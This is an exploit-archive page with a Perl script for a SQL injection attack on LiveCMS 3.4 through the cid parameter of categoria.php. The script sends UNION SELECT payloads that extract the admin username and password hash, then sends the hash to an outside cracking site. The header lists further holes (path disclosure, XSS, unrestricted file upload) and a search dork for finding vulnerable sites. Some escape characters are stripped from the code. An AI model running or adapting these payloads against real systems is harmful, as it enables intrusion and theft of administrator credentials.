LiveCMS <= 3.4 (categoria.php cid) Remote SQL Injection Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : LiveCMS <= 3.4 (categoria.php cid) Remote SQL Injection Exploit
# Published : 2007-06-20
# Author : g00ns
# Previous Title : SerWeb 0.9.4 (load_lang.php) Remote File Inclusion Exploit
# Next Title : W1L3D4 WEBmarket 0.1 Remote SQL Injection Vulnerability
#!/usr/bin/perl
##############################################################################################
#         ___   ___                         _
#        / _  / _                        | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ / __| | '_  / _  __|
# | (_| | |_| | |_| | | | __ _| | | |  __/ |_
#  __, |___/ ___/|_| |_|___(_)_| |_|___|__|
#   __/ |
#  |___/
###############################################################################################
#INFO:
#Program Title ################################################################################
#LiveCMS <= 3.4 SQL Injection, Absolute Path Disclosure, XSS Injection, Arbitrary File Upload
#
#Description ##################################################################################
#This is a free CMS system.
#
#Script Download ##############################################################################
#http://sourceforge.net/project/downloading.php?group_id=78735&use_mirror=ufpr&filename=livecms-3.4.tar.gz&12060460
#http://livecms.com
#
#Original Advisory #############################################################################
#http://www.g00ns-forum.net/showthread.php?t=9350
#
#Exploit #######################################################################################
#credz to Vipsta and Clorox for vulnerability
#[c]ode by TrinTiTTY (2007) www.g00ns.net
#shoutz: z3r0, milf, blackhill, godxcel, murderskillz, katalyst, SyNiCaL, OD, pr0be, rezen, str0ke,
#fish, rey, canuck, c0ma, sick, trin, a59, seven, fury, <S>, Bernard, and everyone else at g00ns.net
#
#Details #######################################################################################                              
#APD: The absolute path is disclosed in a mysql error when categoria.php's paramater cid is queried with a non-defined
#variable. example: categoria.php?cid='
#XSS: Article names are not properly santised, a user could insert malicious javascript
#AFU: Articles can have a small image that is uploaded with them, however LiveCMS fails to restrict what file types
#can be uploaded.  A user could upload a malicious script with this method and compromise the server.
#GoogleDork: "powered by livecms"
#
################################################################################################
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#
#                LiveCMS <= 3.3  [ categoria.php ]               #
#                    ] Remote SQL Injection [                    #
#                                                                #
#              [c]ode by TrinTiTTY [at] g00ns.net                #
#              Vulnerability by Vipsta and Clorox                #
#                                                                #
#                                                                #
#  [irc.g00ns.net]       [www.g00ns.net]        [ts.g00ns.net]   #
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++#

use LWP;

$host = @ARGV[0];
$ua = LWP::UserAgent->new;

my $uject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,user,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';
my $pject ='categoria.php?cid=1%20UNION%20ALL%20SELECT%201,2,pass,4,5,6%20FROM%20live_admin%20WHERE%20userid=1/*';

if (@ARGV < 1){&top( );&usage( )}
elsif ($host =~ /http:///){print"nn [-] Don't use http:// in hostn";exit( 0 );}
else { &getUser( ) }



sub getUser( ) {
  system("color 4");
  &top( );
  print "n [~] Retrieving admin usernamen";
  $nameres = $ua->get("http://$host/$uject");

  $namecon = $nameres->content;

  if ($namecon =~ /<td>(.*)a href="(.*)"(.*)>(.*)</a></td>/gmi)
  {
     $user = $4;
     print "n [+] Admin user retrieved: $usern";
     print "n [~] Retrieving password for $usern";
     getPass( )
  }
  else {
      print "n [-] Unable to retrieve admin usernamen";
      print "n [~] Retrieving passwordn";
      getPass( )
  }
}

sub getPass( ) {

  $passres = $ua->get("http://$host/$pject");

  $passCon = $passres->content;

  if ($passCon =~ /<td>(.*)a href="(.*)"(.*)>([a-f0-9]{32})</a></td>/gmi)
  {
     $pass = $4;
     print "n [+] Admin password retrieved: $passn";
     &resolveHash($pass);
     system("color 7");
  }
  else {
      print "n [-] Unable to retrieve admin passwordn";
      system("color 7");
      exit(0);
  }
}

sub resolveHash($)
{
  print "n [~] Attempting to resolve hashn";
  $hashget = LWP::UserAgent->new;  #thx gdata
  $resp = $hashget->get("http://gdataonline.com/qkhash.php?mode=txt&hash=$_[0]"); # checks gdata for hash
  $hashans = $resp->content;
  if ($hashans =~ mwidth="35%"><b>([  -_a-z0-9.*?&=;<>/""]{1,25})</b></td>){
     $crack = $1;
     print "n [+] Password hash resolved: $crackn";
     system("color 7");
     exit(0);
  }
  else {
     print "n [-] Couldn't resolve hashn";
     system("color 7");
     exit(0);
  }
}
sub top( )
{
  print q {
  ##################################################################
  #                LiveCMS <= 3.3  [ categoria.php ]               #
  #                    ] Remote SQL Injection [                    #
  #                                                                #
  #                [c]ode by TrinTiTTY [at] g00ns.net              #
  #                Vulnerability by Vipsta and Clorox              #
  ##################################################################
  }
}
sub usage( )
{
  print "n Usage: perl livecms33.pl <host>n";
  print "n Example: perl livecms33.pl www.example.com/pathnn";
  exit(0);
}

# www.Syue.com [2007-06-20]